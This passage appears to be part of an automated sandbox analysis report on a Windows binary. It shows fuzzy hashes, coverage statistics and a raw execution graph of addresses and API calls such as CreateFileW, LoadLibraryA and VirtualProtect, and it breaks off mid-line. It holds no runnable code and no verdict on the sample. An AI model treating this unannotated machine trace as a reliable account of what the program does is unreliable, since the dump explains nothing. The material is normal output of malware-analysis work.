                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 12447209ac998d916ea5af24bee96286b8310982615a7f3bb8f9e7bff02e83a7
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AB017126A1CA0685F720BF60946727EA3B4EF49728FD40036E54D82791DE2CF548CA24

                                                                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                                                                          Execution Coverage:3.1%
                                                                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                          Signature Coverage:0.9%
                                                                                                                                                                                                                                          Total number of Nodes:1076
                                                                                                                                                                                                                                          Total number of Limit Nodes:81
                                                                                                                                                                                                                                          execution_graph 69647 7ff8a87b0da0 69648 7ff8a87b0dcc 69647->69648 69657 7ff8a87b0dd1 69647->69657 69660 7ff8a87d49e0 69648->69660 69650 7ff8a87b0ed4 69651 7ff8a87b0f30 69650->69651 69652 7ff8a87b0f1a 69650->69652 69656 7ff8a87b0ed8 69650->69656 69667 7ff8a875a510 7 API calls 69651->69667 69666 7ff8a875a510 7 API calls 69652->69666 69657->69650 69657->69656 69659 7ff8a87b0ec1 69657->69659 69664 7ff8a87ee1f0 8 API calls new[] 69657->69664 69659->69650 69665 7ff8a87f0040 12 API calls new[] 69659->69665 69661 7ff8a87d49f9 69660->69661 69663 7ff8a87d4a05 69660->69663 69668 7ff8a87d4910 69661->69668 69663->69657 69664->69659 69665->69650 69666->69656 69667->69656 69669 7ff8a87d494a 69668->69669 69671 7ff8a87d495a 69668->69671 69674 7ff8a87d4450 69669->69674 69672 7ff8a87d49ad 69671->69672 69673 7ff8a87d4450 32 API calls 69671->69673 69672->69663 69673->69671 69698 7ff8a87d4150 69674->69698 69676 7ff8a87d453a 69772 7ff8a8882920 69676->69772 69677 7ff8a87d450c 69677->69676 69686 7ff8a87d45de 69677->69686 69687 7ff8a87d45f8 69677->69687 69729 7ff8a8773820 69677->69729 69678 7ff8a87d48db 69771 7ff8a87b1310 7 API calls 69678->69771 69682 7ff8a87d48fb 69682->69671 69684 7ff8a87d4594 69685 7ff8a87d459a 69684->69685 69684->69687 69685->69686 69688 7ff8a87d45cf 00007FF8BFAC3010 69685->69688 69686->69676 69686->69678 69770 7ff8a8756c40 7 API calls 69686->69770 69692 7ff8a87d4681 69687->69692 69737 7ff8a8759180 69687->69737 69688->69686 69692->69686 69769 7ff8a8774c10 13 API calls 69692->69769 69694 7ff8a87d4827 69695 7ff8a87d4855 69694->69695 69767 7ff8a87ae520 31 API calls 69694->69767 69695->69692 69768 7ff8a87b13a0 7 API calls 69695->69768 69699 7ff8a87d4172 69698->69699 69717 7ff8a87d4404 69698->69717 69700 7ff8a87d417b 69699->69700 69703 7ff8a87d4193 69699->69703 69809 7ff8a87d4040 7 API calls 69700->69809 69702 7ff8a87d4186 69702->69677 69705 7ff8a87d41d2 69703->69705 69710 7ff8a87d4383 69703->69710 69706 7ff8a87d4224 69705->69706 69810 7ff8a87d4040 7 API calls 69705->69810 69779 7ff8a87d4cf0 69706->69779 69709 7ff8a87d4293 69711 7ff8a87d42d8 69709->69711 69709->69717 69719 7ff8a87d4322 69709->69719 69710->69717 69818 7ff8a87d4040 7 API calls 69710->69818 69814 7ff8a8759350 7 API calls 69711->69814 69713 7ff8a87d4295 69713->69709 69812 7ff8a8813c10 10 API calls 69713->69812 69714 7ff8a87d428b 69811 7ff8a8756c40 7 API calls 69714->69811 69717->69677 69718 7ff8a87d42e9 69815 7ff8a8759350 7 API calls 69718->69815 69816 7ff8a87859e0 22 API calls 69719->69816 69723 7ff8a87d4313 69723->69677 69724 7ff8a87d42a6 69813 7ff8a87d4040 7 API calls 69724->69813 69726 7ff8a87d434e 69817 7ff8a8812350 21 API calls 69726->69817 69728 7ff8a87d4374 69728->69677 69733 7ff8a8773857 69729->69733 69730 7ff8a87738b9 69730->69684 69731 7ff8a8773a75 69731->69730 69876 7ff8a876b2c0 7 API calls new[] 69731->69876 69733->69730 69733->69731 69863 7ff8a8773400 69733->69863 69874 7ff8a876a660 RaiseException IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 69733->69874 69875 7ff8a8767280 13 API calls 69733->69875 69960 7ff8a87590b0 69737->69960 69740 7ff8a87ccfb0 69741 7ff8a87ccfe6 69740->69741 69742 7ff8a87ccfdd 69740->69742 69741->69742 69755 7ff8a87cd050 69741->69755 70016 7ff8a8759350 7 API calls 69742->70016 69744 7ff8a87cd015 70017 7ff8a8759350 7 API calls 69744->70017 69746 7ff8a87cd03f 69746->69694 69748 7ff8a87cd45d 69751 7ff8a87cd4bd 69748->69751 70023 7ff8a87859e0 22 API calls 69748->70023 69753 7ff8a87cd5f4 69751->69753 70024 7ff8a8813c10 10 API calls 69751->70024 69753->69694 69755->69748 69760 7ff8a87cd471 69755->69760 69764 7ff8a87cd45f 69755->69764 69766 7ff8a87d4150 28 API calls 69755->69766 69984 7ff8a87d52a0 69755->69984 69996 7ff8a8788ff0 69755->69996 70018 7ff8a878a0d0 10 API calls 69755->70018 70019 7ff8a8781530 10 API calls 69755->70019 70020 7ff8a8785a70 22 API calls 69755->70020 69756 7ff8a87cd5ec 69756->69753 69757 7ff8a8756180 new[] 7 API calls 69756->69757 69758 7ff8a87cd615 69757->69758 69758->69753 69759 7ff8a87cd61d 00007FF8BFAC3010 69758->69759 69759->69753 70022 7ff8a8785a70 22 API calls 69760->70022 70021 7ff8a8756c40 7 API calls 69764->70021 69766->69755 69767->69695 69768->69692 69769->69686 69770->69678 69771->69676 69773 7ff8a8882929 69772->69773 69774 7ff8a8882934 69773->69774 69775 7ff8a8882974 IsProcessorFeaturePresent 69773->69775 69774->69682 69776 7ff8a888298c 69775->69776 70036 7ff8a8882b6c RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 69776->70036 69778 7ff8a888299f 69778->69682 69780 7ff8a87d4d64 69779->69780 69781 7ff8a87d4ddf 69780->69781 69795 7ff8a87d4dfd 69780->69795 69837 7ff8a875a510 7 API calls 69781->69837 69783 7ff8a87d4fbb 69819 7ff8a880fcf0 69783->69819 69784 7ff8a87d4ef7 69784->69783 69785 7ff8a87d4f2a 69784->69785 69788 7ff8a87d4f33 69785->69788 69789 7ff8a87d4f5b 69785->69789 69787 7ff8a8882920 4 API calls 69790 7ff8a87d4262 69787->69790 69839 7ff8a875a380 10 API calls 69788->69839 69793 7ff8a87d4f74 00007FF8BFAC3010 69789->69793 69797 7ff8a87d4f94 69789->69797 69790->69709 69790->69713 69790->69714 69792 7ff8a87d504e 69796 7ff8a87d51a5 69792->69796 69843 7ff8a8785a70 22 API calls 69792->69843 69794 7ff8a880fcf0 7 API calls 69793->69794 69794->69797 69795->69784 69798 7ff8a87d4ed2 69795->69798 69800 7ff8a87d4df0 69796->69800 69844 7ff8a875a380 10 API calls 69796->69844 69803 7ff8a87d5025 00007FF8BFAC3010 69797->69803 69805 7ff8a87d503a 69797->69805 69838 7ff8a875a380 10 API calls 69798->69838 69800->69787 69803->69805 69804 7ff8a8773820 13 API calls 69804->69805 69805->69792 69805->69800 69805->69804 69840 7ff8a8756c40 7 API calls 69805->69840 69841 7ff8a87b1310 7 API calls 69805->69841 69842 7ff8a8774c10 13 API calls 69805->69842 69809->69702 69810->69706 69811->69709 69812->69724 69813->69709 69814->69718 69815->69723 69816->69726 69817->69728 69818->69717 69821 7ff8a880fd41 69819->69821 69822 7ff8a881004e 69821->69822 69824 7ff8a8810109 69821->69824 69845 7ff8a880f160 69821->69845 69827 7ff8a881017d 69822->69827 69828 7ff8a8759180 7 API calls 69822->69828 69832 7ff8a8810160 69822->69832 69855 7ff8a875a510 7 API calls 69824->69855 69825 7ff8a881021e 69829 7ff8a8810277 69825->69829 69858 7ff8a87e5df0 7 API calls 69825->69858 69827->69825 69857 7ff8a87b17d0 7 API calls 69827->69857 69828->69832 69830 7ff8a8882920 4 API calls 69829->69830 69833 7ff8a88102c0 69830->69833 69856 7ff8a8759350 7 API calls 69832->69856 69833->69797 69835 7ff8a8810245 69835->69829 69859 7ff8a879d1e0 7 API calls 69835->69859 69837->69800 69838->69800 69839->69800 69840->69805 69841->69805 69842->69805 69843->69796 69844->69800 69848 7ff8a880f1a3 69845->69848 69846 7ff8a880f27b 69854 7ff8a880f299 69846->69854 69860 7ff8a880c330 7 API calls 69846->69860 69847 7ff8a880f2bd 69850 7ff8a880f2f0 69847->69850 69851 7ff8a880f303 69847->69851 69847->69854 69848->69846 69848->69847 69861 7ff8a875a510 7 API calls 69850->69861 69862 7ff8a875a510 7 API calls 69851->69862 69854->69821 69855->69822 69856->69827 69858->69835 69859->69829 69860->69854 69861->69854 69862->69854 69877 7ff8a8769d10 69863->69877 69866 7ff8a8773534 69866->69733 69867 7ff8a87735ed 69867->69866 69908 7ff8a8767280 13 API calls 69867->69908 69868 7ff8a8773432 69868->69866 69868->69867 69871 7ff8a8773523 69868->69871 69906 7ff8a876b9e0 7 API calls 69868->69906 69871->69866 69871->69867 69907 7ff8a8815b10 7 API calls 69871->69907 69874->69733 69875->69733 69876->69730 69882 7ff8a8769d40 69877->69882 69885 7ff8a8769dd1 69877->69885 69878 7ff8a8882920 4 API calls 69879 7ff8a876a0c9 69878->69879 69879->69866 69887 7ff8a876a0e0 69879->69887 69880 7ff8a8769e92 69883 7ff8a8769ed5 69880->69883 69880->69885 69910 7ff8a8767ca0 9 API calls 69880->69910 69882->69880 69882->69883 69882->69885 69909 7ff8a8815b50 7 API calls 69882->69909 69883->69885 69911 7ff8a876b9e0 7 API calls 69883->69911 69885->69878 69888 7ff8a876a135 69887->69888 69889 7ff8a876a102 69887->69889 69912 7ff8a87650c0 69888->69912 69924 7ff8a8759350 7 API calls 69889->69924 69891 7ff8a876a258 69925 7ff8a8759350 7 API calls 69891->69925 69892 7ff8a876a2b0 69896 7ff8a876a2de 69892->69896 69898 7ff8a876a2c8 69892->69898 69895 7ff8a876a154 69895->69891 69895->69892 69897 7ff8a876a12e 69895->69897 69902 7ff8a876a16d 69895->69902 69901 7ff8a876a2fa 69896->69901 69896->69902 69897->69868 69918 7ff8a8768060 69898->69918 69900 7ff8a876a31d 69928 7ff8a8766940 7 API calls new[] 69900->69928 69901->69897 69901->69900 69927 7ff8a8763390 7 API calls new[] 69901->69927 69902->69897 69926 7ff8a8767280 13 API calls 69902->69926 69906->69871 69907->69867 69908->69866 69909->69880 69910->69883 69911->69885 69913 7ff8a876510f 69912->69913 69916 7ff8a8765137 69913->69916 69917 7ff8a876514b 69913->69917 69938 7ff8a8764a00 7 API calls new[] 69913->69938 69916->69895 69917->69916 69929 7ff8a8764830 69917->69929 69919 7ff8a876808f 69918->69919 69921 7ff8a876809c 69918->69921 69958 7ff8a876f040 8 API calls 69919->69958 69922 7ff8a87680ac 69921->69922 69949 7ff8a875d9f0 69921->69949 69922->69902 69924->69897 69925->69902 69926->69897 69927->69900 69928->69897 69934 7ff8a8764949 69929->69934 69935 7ff8a8764858 69929->69935 69930 7ff8a87648c6 69931 7ff8a876494e 69930->69931 69932 7ff8a876493f 69930->69932 69930->69934 69944 7ff8a87645c0 7 API calls new[] 69931->69944 69943 7ff8a87645c0 7 API calls new[] 69932->69943 69934->69916 69935->69930 69939 7ff8a8756180 69935->69939 69938->69917 69940 7ff8a8756199 69939->69940 69941 7ff8a8756240 69939->69941 69940->69941 69945 7ff8a8755b35 69940->69945 69941->69930 69943->69934 69944->69934 69946 7ff8a8755b46 69945->69946 69947 7ff8a8755b62 69946->69947 69948 7ff8a8759350 7 API calls 69946->69948 69947->69941 69948->69947 69950 7ff8a875da1d 69949->69950 69956 7ff8a875da6a 69949->69956 69951 7ff8a875da53 00007FF8BFAC3010 69950->69951 69952 7ff8a875da33 00007FF8BFAC3010 69950->69952 69951->69956 69957 7ff8a875da38 69952->69957 69953 7ff8a875da93 ReadFile 69954 7ff8a875db29 69953->69954 69953->69956 69954->69957 69959 7ff8a8759350 7 API calls 69954->69959 69956->69953 69956->69954 69956->69957 69957->69922 69958->69921 69959->69957 69969 7ff8a8756ec0 69960->69969 69962 7ff8a8759136 69963 7ff8a875914f 69962->69963 69981 7ff8a8756c40 7 API calls 69962->69981 69965 7ff8a8882920 4 API calls 69963->69965 69968 7ff8a8759162 69965->69968 69968->69740 69972 7ff8a8756f09 69969->69972 69970 7ff8a8758606 69971 7ff8a8882920 4 API calls 69970->69971 69973 7ff8a8758643 69971->69973 69972->69970 69974 7ff8a8756f93 69972->69974 69975 7ff8a8756f83 69972->69975 69979 7ff8a8756f91 69972->69979 69973->69962 69980 7ff8a8758cd0 7 API calls new[] 69973->69980 69978 7ff8a8756f97 00007FF8BFAC3010 69974->69978 69974->69979 69982 7ff8a8758c00 00007FF8BFAC3010 69975->69982 69978->69979 69979->69970 69983 7ff8a8758c00 00007FF8BFAC3010 69979->69983 69980->69962 69981->69963 69982->69979 69983->69970 69985 7ff8a87d532e 69984->69985 69986 7ff8a87d52d8 69984->69986 69985->69986 69987 7ff8a87d5350 69985->69987 70025 7ff8a8759350 7 API calls 69986->70025 69988 7ff8a87d52f0 69987->69988 69994 7ff8a87d5355 69987->69994 70026 7ff8a8759350 7 API calls 69988->70026 69991 7ff8a87d531a 69991->69755 69992 7ff8a87d4cf0 27 API calls 69992->69994 69993 7ff8a87d544d 69993->69755 69994->69992 69994->69993 70027 7ff8a87bb0c0 7 API calls 69994->70027 69997 7ff8a8789004 69996->69997 69998 7ff8a8789017 69996->69998 70028 7ff8a8759350 7 API calls 69997->70028 70000 7ff8a878902d 69998->70000 70029 7ff8a8759350 7 API calls 69998->70029 70001 7ff8a8789015 70000->70001 70004 7ff8a8789071 70000->70004 70030 7ff8a8759350 7 API calls 70001->70030 70031 7ff8a8788d60 25 API calls 70004->70031 70006 7ff8a8789064 70006->69755 70009 7ff8a87890f6 70014 7ff8a8789102 70009->70014 70035 7ff8a8781530 10 API calls 70009->70035 70010 7ff8a8789095 70010->70009 70013 7ff8a87890f1 70010->70013 70032 7ff8a87d54c0 27 API calls 70010->70032 70033 7ff8a8787ee0 22 API calls 70010->70033 70034 7ff8a8788d60 25 API calls 70010->70034 70013->69755 70014->70013 70015 7ff8a8789183 00007FF8BFAC3010 70014->70015 70015->70013 70016->69744 70017->69746 70018->69755 70019->69755 70020->69755 70021->69748 70022->69748 70023->69751 70024->69756 70025->69988 70026->69991 70027->69994 70028->70001 70029->70000 70030->70006 70031->70010 70032->70010 70033->70010 70034->70010 70035->70014 70036->69778 70037 7ff8a87b29e0 70038 7ff8a87b2a1f 70037->70038 70048 7ff8a87b2e57 70037->70048 70039 7ff8a87b2d3e 00007FF8BFAC3010 70038->70039 70038->70048 70060 7ff8a87a8430 7 API calls new[] 70038->70060 70043 7ff8a87b2d6a 70039->70043 70041 7ff8a87b2e9e 70046 7ff8a87b2ebb 70041->70046 70049 7ff8a8756940 70041->70049 70043->70041 70044 7ff8a87b2e43 70043->70044 70061 7ff8a875a510 7 API calls 70044->70061 70046->70046 70047 7ff8a87b2f79 00007FF8BFAC3010 70046->70047 70046->70048 70047->70048 70050 7ff8a875695a 70049->70050 70051 7ff8a87569f1 70049->70051 70052 7ff8a87569c8 70050->70052 70056 7ff8a875696c 70050->70056 70051->70046 70062 7ff8a87565d0 70052->70062 70058 7ff8a875699a 00007FF8BFAC3010 70056->70058 70059 7ff8a87569aa 70056->70059 70057 7ff8a87569e3 70057->70046 70058->70059 70059->70046 70060->70039 70061->70048 70063 7ff8a87565e5 70062->70063 70064 7ff8a875660b 70063->70064 70067 7ff8a8755b95 70063->70067 70064->70059 70066 7ff8a8756c40 7 API calls 70064->70066 70066->70057 70068 7ff8a8755bae 70067->70068 70070 7ff8a8755bd6 70068->70070 70071 7ff8a8759350 7 API calls 70068->70071 70070->70064 70071->70070 70072 7ff8a92def30 70073 7ff8a92d1325 70072->70073 70074 7ff8a92def50 SetLastError 70073->70074 70075 7ff8a92def70 70074->70075 70076 7ff710f55698 70077 7ff710f556cf 70076->70077 70078 7ff710f556b2 70076->70078 70077->70078 70080 7ff710f556e2 CreateFileW 70077->70080 70101 7ff710f54f58 11 API calls _get_daylight 70078->70101 70082 7ff710f5574c 70080->70082 70083 7ff710f55716 70080->70083 70081 7ff710f556b7 70102 7ff710f54f78 11 API calls _get_daylight 70081->70102 70105 7ff710f55c74 46 API calls 3 library calls 70082->70105 70104 7ff710f557ec 59 API calls 3 library calls 70083->70104 70087 7ff710f55751 70090 7ff710f55755 70087->70090 70091 7ff710f55780 70087->70091 70088 7ff710f556bf 70103 7ff710f5a950 37 API calls _invalid_parameter_noinfo 70088->70103 70089 7ff710f55724 70093 7ff710f5572b CloseHandle 70089->70093 70094 7ff710f55741 CloseHandle 70089->70094 70106 7ff710f54eec 11 API calls 2 library calls 70090->70106 70107 7ff710f55a34 51 API calls 70091->70107 70097 7ff710f556ca 70093->70097 70094->70097 70098 7ff710f5578d 70108 7ff710f55b70 21 API calls _fread_nolock 70098->70108 70100 7ff710f5575f 70100->70097 70101->70081 70102->70088 70103->70097 70104->70089 70105->70087 70106->70100 70107->70098 70108->70100 70109 7ff8a878e926 70112 7ff8a878e933 70109->70112 70110 7ff8a878e987 70123 7ff8a878eace 70110->70123 70149 7ff8a878b630 7 API calls new[] 70110->70149 70112->70110 70168 7ff8a877d2b0 11 API calls 70112->70168 70113 7ff8a878e9b3 70115 7ff8a87924fb 70113->70115 70150 7ff8a87722e0 70113->70150 70174 7ff8a8756c40 7 API calls 70115->70174 70119 7ff8a8792508 70175 7ff8a8781eb0 7 API calls 70119->70175 70122 7ff8a878ea09 70125 7ff8a878ea76 70122->70125 70126 7ff8a878ea2e 70122->70126 70139 7ff8a878ea69 70122->70139 70130 7ff8a8791fb5 70123->70130 70176 7ff8a8759350 7 API calls 70123->70176 70124 7ff8a8792517 70172 7ff8a8775120 7 API calls 70125->70172 70170 7ff8a877cfe0 14 API calls 70126->70170 70127 7ff8a87925ab 70178 7ff8a8759350 7 API calls 70127->70178 70130->70127 70177 7ff8a8781eb0 7 API calls 70130->70177 70133 7ff8a878ea40 70133->70139 70171 7ff8a8775120 7 API calls 70133->70171 70134 7ff8a8792186 70134->70115 70134->70123 70138 7ff8a87925f6 70140 7ff8a8792607 70138->70140 70179 7ff8a8785530 22 API calls 70138->70179 70139->70123 70173 7ff8a8772c40 21 API calls 70139->70173 70142 7ff8a8792618 70140->70142 70180 7ff8a8756c40 7 API calls 70140->70180 70145 7ff8a87920c4 70142->70145 70181 7ff8a87b1310 7 API calls 70142->70181 70146 7ff8a8882920 4 API calls 70145->70146 70148 7ff8a87920f7 70145->70148 70147 7ff8a87926d3 70146->70147 70149->70113 70151 7ff8a8772334 70150->70151 70152 7ff8a8756180 new[] 7 API calls 70151->70152 70157 7ff8a87723b6 70152->70157 70153 7ff8a8756180 new[] 7 API calls 70155 7ff8a877269a 70153->70155 70154 7ff8a8882920 4 API calls 70156 7ff8a8772473 70154->70156 70166 7ff8a8772456 70155->70166 70182 7ff8a87692c0 70155->70182 70156->70123 70169 7ff8a876b2c0 7 API calls new[] 70156->70169 70159 7ff8a8756180 new[] 7 API calls 70157->70159 70164 7ff8a877249d 70157->70164 70157->70166 70160 7ff8a877244a 70159->70160 70162 7ff8a877248f 00007FF8BFAC3010 70160->70162 70160->70164 70160->70166 70161 7ff8a87726f5 70165 7ff8a877276e 70161->70165 70167 7ff8a875d9f0 10 API calls 70161->70167 70162->70164 70164->70153 70164->70165 70164->70166 70165->70166 70202 7ff8a8768a20 18 API calls 70165->70202 70166->70154 70167->70165 70168->70110 70169->70122 70170->70133 70171->70139 70172->70139 70173->70134 70174->70119 70175->70124 70176->70130 70177->70127 70178->70138 70179->70140 70180->70142 70181->70145 70183 7ff8a876949d 70182->70183 70184 7ff8a8769345 70182->70184 70185 7ff8a87693a0 70183->70185 70188 7ff8a8756180 new[] 7 API calls 70183->70188 70184->70183 70187 7ff8a876935e 70184->70187 70186 7ff8a8756180 new[] 7 API calls 70185->70186 70200 7ff8a87695d2 70185->70200 70191 7ff8a87693ef 70186->70191 70189 7ff8a8756180 new[] 7 API calls 70187->70189 70197 7ff8a87694d5 70188->70197 70190 7ff8a8769379 70189->70190 70192 7ff8a8769385 00007FF8BFAC3010 70190->70192 70190->70200 70193 7ff8a8769465 00007FF8BFAC3010 70191->70193 70198 7ff8a8769689 70191->70198 70191->70200 70192->70185 70194 7ff8a876963b 70193->70194 70195 7ff8a8769487 00007FF8BFAC3010 70193->70195 70196 7ff8a876963e 00007FF8BFAC3010 00007FF8BFAC3010 70194->70196 70195->70196 70196->70198 70197->70185 70197->70200 70214 7ff8a8815b50 7 API calls 70197->70214 70198->70200 70203 7ff8a875ffe0 70198->70203 70200->70161 70202->70166 70209 7ff8a8760031 70203->70209 70206 7ff8a8882920 4 API calls 70207 7ff8a8760657 70206->70207 70207->70200 70208 7ff8a8760200 CreateFileW 70208->70209 70209->70208 70211 7ff8a8760485 70209->70211 70212 7ff8a87603b8 70209->70212 70215 7ff8a875d030 70209->70215 70219 7ff8a875fa20 7 API calls new[] 70209->70219 70220 7ff8a8759350 7 API calls 70209->70220 70221 7ff8a8815b50 7 API calls 70211->70221 70212->70206 70214->70185 70216 7ff8a875d06e 70215->70216 70217 7ff8a8756180 new[] 7 API calls 70216->70217 70218 7ff8a875d083 70216->70218 70217->70218 70218->70209 70219->70209 70220->70209 70221->70212 70222 7ff8a9315c00 70223 7ff8a9315c1d 70222->70223 70224 7ff8a9315d23 70223->70224 70228 7ff8a9315d3e 70223->70228 70225 7ff8a92d127b SetLastError 70224->70225 70227 7ff8a9315d39 70225->70227 70228->70227 70229 7ff8a92d127b 70228->70229 70229->70227 70231 7ff8a9318a40 70229->70231 70230 7ff8a9318ac3 SetLastError 70230->70231 70232 7ff8a9318b27 70230->70232 70231->70230 70231->70232 70232->70227 70233 7ff8a8719060 70234 7ff8a8719c01 70233->70234 70241 7ff8a8719078 70233->70241 70235 7ff8a8719b0e LoadLibraryA 70236 7ff8a8719b28 70235->70236 70239 7ff8a8719b47 GetProcAddress 70236->70239 70236->70241 70238 7ff8a8719b69 VirtualProtect VirtualProtect 70238->70234 70239->70236 70240 7ff8a8719b5e 70239->70240 70241->70235 70241->70238 70242 7ff710f42fe0 70243 7ff710f42ff0 70242->70243 70244 7ff710f4302b 70243->70244 70245 7ff710f43041 70243->70245 70304 7ff710f42710 54 API calls _log10_special 70244->70304 70247 7ff710f43061 70245->70247 70257 7ff710f43077 __vcrt_freefls 70245->70257 70305 7ff710f42710 54 API calls _log10_special 70247->70305 70252 7ff710f43349 70321 7ff710f42710 54 API calls _log10_special 70252->70321 70255 7ff710f43333 70320 7ff710f42710 54 API calls _log10_special 70255->70320 70257->70252 70257->70255 70258 7ff710f4330d 70257->70258 70260 7ff710f43207 70257->70260 70269 7ff710f43037 __vcrt_freefls 70257->70269 70270 7ff710f41470 70257->70270 70300 7ff710f41c80 70257->70300 70319 7ff710f42710 54 API calls _log10_special 70258->70319 70261 7ff710f43273 70260->70261 70315 7ff710f5a474 37 API calls 2 library calls 70260->70315 70263 7ff710f4329e 70261->70263 70264 7ff710f43290 70261->70264 70317 7ff710f42dd0 37 API calls 70263->70317 70316 7ff710f5a474 37 API calls 2 library calls 70264->70316 70267 7ff710f4329c 70318 7ff710f42500 54 API calls __vcrt_freefls 70267->70318 70306 7ff710f4c5c0 70269->70306 70322 7ff710f445b0 70270->70322 70273 7ff710f414bc 70332 7ff710f50744 70273->70332 70274 7ff710f4149b 70362 7ff710f42710 54 API calls _log10_special 70274->70362 70277 7ff710f414ab 70277->70257 70278 7ff710f414d1 70279 7ff710f414f8 70278->70279 70280 7ff710f414d5 70278->70280 70284 7ff710f41508 70279->70284 70285 7ff710f41532 70279->70285 70363 7ff710f54f78 11 API calls _get_daylight 70280->70363 70282 7ff710f414da 70364 7ff710f42910 54 API calls _log10_special 70282->70364 70365 7ff710f54f78 11 API calls _get_daylight 70284->70365 70287 7ff710f41538 70285->70287 70292 7ff710f4154b 70285->70292 70336 7ff710f41210 70287->70336 70288 7ff710f41510 70366 7ff710f42910 54 API calls _log10_special 70288->70366 70293 7ff710f414f3 __vcrt_freefls 70292->70293 70296 7ff710f415d6 70292->70296 70367 7ff710f5040c 70292->70367 70358 7ff710f500bc 70293->70358 70294 7ff710f415c4 70294->70257 70370 7ff710f54f78 11 API calls _get_daylight 70296->70370 70298 7ff710f415db 70371 7ff710f42910 54 API calls _log10_special 70298->70371 70301 7ff710f41ca5 70300->70301 70612 7ff710f549f4 70301->70612 70304->70269 70305->70269 70307 7ff710f4c5c9 70306->70307 70308 7ff710f431fa 70307->70308 70309 7ff710f4c950 IsProcessorFeaturePresent 70307->70309 70310 7ff710f4c968 70309->70310 70635 7ff710f4cb48 RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 70310->70635 70312 7ff710f4c97b 70636 7ff710f4c910 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 70312->70636 70315->70261 70316->70267 70317->70267 70318->70269 70319->70269 70320->70269 70321->70269 70323 7ff710f445bc 70322->70323 70372 7ff710f49400 70323->70372 70325 7ff710f445e4 70326 7ff710f49400 2 API calls 70325->70326 70327 7ff710f445f7 70326->70327 70377 7ff710f56004 70327->70377 70330 7ff710f4c5c0 _log10_special 8 API calls 70331 7ff710f41493 70330->70331 70331->70273 70331->70274 70333 7ff710f50774 70332->70333 70545 7ff710f504d4 70333->70545 70335 7ff710f5078d 70335->70278 70337 7ff710f41268 70336->70337 70338 7ff710f41297 70337->70338 70339 7ff710f4126f 70337->70339 70342 7ff710f412b1 70338->70342 70343 7ff710f412d4 70338->70343 70562 7ff710f42710 54 API calls _log10_special 70339->70562 70341 7ff710f41282 70341->70293 70563 7ff710f54f78 11 API calls _get_daylight 70342->70563 70347 7ff710f412e6 70343->70347 70356 7ff710f41309 memcpy_s 70343->70356 70345 7ff710f412b6 70564 7ff710f42910 54 API calls _log10_special 70345->70564 70565 7ff710f54f78 11 API calls _get_daylight 70347->70565 70349 7ff710f412eb 70566 7ff710f42910 54 API calls _log10_special 70349->70566 70350 7ff710f5040c _fread_nolock 53 API calls 70350->70356 70352 7ff710f412cf __vcrt_freefls 70352->70293 70353 7ff710f413cf 70567 7ff710f42710 54 API calls _log10_special 70353->70567 70356->70350 70356->70352 70356->70353 70357 7ff710f50180 37 API calls 70356->70357 70558 7ff710f50b4c 70356->70558 70357->70356 70359 7ff710f500ec 70358->70359 70584 7ff710f4fe98 70359->70584 70361 7ff710f50105 70361->70294 70362->70277 70363->70282 70364->70293 70365->70288 70366->70293 70596 7ff710f5042c 70367->70596 70370->70298 70371->70293 70373 7ff710f49422 MultiByteToWideChar 70372->70373 70376 7ff710f49446 70372->70376 70375 7ff710f4945c __vcrt_freefls 70373->70375 70373->70376 70374 7ff710f49463 MultiByteToWideChar 70374->70375 70375->70325 70376->70374 70376->70375 70378 7ff710f55f38 70377->70378 70379 7ff710f55f5e 70378->70379 70381 7ff710f55f91 70378->70381 70408 7ff710f54f78 11 API calls _get_daylight 70379->70408 70384 7ff710f55f97 70381->70384 70385 7ff710f55fa4 70381->70385 70382 7ff710f55f63 70409 7ff710f5a950 37 API calls _invalid_parameter_noinfo 70382->70409 70410 7ff710f54f78 11 API calls _get_daylight 70384->70410 70396 7ff710f5ac98 70385->70396 70389 7ff710f55fb8 70411 7ff710f54f78 11 API calls _get_daylight 70389->70411 70390 7ff710f55fc5 70403 7ff710f5ff3c 70390->70403 70393 7ff710f55fd8 70412 7ff710f554e8 LeaveCriticalSection 70393->70412 70395 7ff710f44606 70395->70330 70413 7ff710f60348 EnterCriticalSection 70396->70413 70398 7ff710f5acaf 70399 7ff710f5ad0c 19 API calls 70398->70399 70400 7ff710f5acba 70399->70400 70401 7ff710f603a8 _isindst LeaveCriticalSection 70400->70401 70402 7ff710f55fae 70401->70402 70402->70389 70402->70390 70414 7ff710f5fc38 70403->70414 70406 7ff710f5ff96 70406->70393 70408->70382 70409->70395 70410->70395 70411->70395 70420 7ff710f5fc73 __vcrt_InitializeCriticalSectionEx 70414->70420 70415 7ff710f5fe3a 70419 7ff710f5fe43 70415->70419 70432 7ff710f54f78 11 API calls _get_daylight 70415->70432 70417 7ff710f5ff11 70433 7ff710f5a950 37 API calls _invalid_parameter_noinfo 70417->70433 70419->70406 70426 7ff710f66dc4 70419->70426 70420->70415 70429 7ff710f57aac 51 API calls 3 library calls 70420->70429 70422 7ff710f5fea5 70422->70415 70430 7ff710f57aac 51 API calls 3 library calls 70422->70430 70424 7ff710f5fec4 70424->70415 70431 7ff710f57aac 51 API calls 3 library calls 70424->70431 70434 7ff710f663c4 70426->70434 70429->70422 70430->70424 70431->70415 70432->70417 70433->70419 70435 7ff710f663db 70434->70435 70436 7ff710f663f9 70434->70436 70488 7ff710f54f78 11 API calls _get_daylight 70435->70488 70436->70435 70438 7ff710f66415 70436->70438 70445 7ff710f669d4 70438->70445 70439 7ff710f663e0 70489 7ff710f5a950 37 API calls _invalid_parameter_noinfo 70439->70489 70443 7ff710f663ec 70443->70406 70491 7ff710f66708 70445->70491 70448 7ff710f66a49 70523 7ff710f54f58 11 API calls _get_daylight 70448->70523 70449 7ff710f66a61 70511 7ff710f58590 70449->70511 70460 7ff710f66440 70460->70443 70490 7ff710f58568 LeaveCriticalSection 70460->70490 70468 7ff710f66a4e 70524 7ff710f54f78 11 API calls _get_daylight 70468->70524 70488->70439 70489->70443 70492 7ff710f66734 70491->70492 70500 7ff710f6674e 70491->70500 70492->70500 70536 7ff710f54f78 11 API calls _get_daylight 70492->70536 70494 7ff710f66743 70537 7ff710f5a950 37 API calls _invalid_parameter_noinfo 70494->70537 70496 7ff710f6681d 70501 7ff710f6687a 70496->70501 70542 7ff710f59be8 37 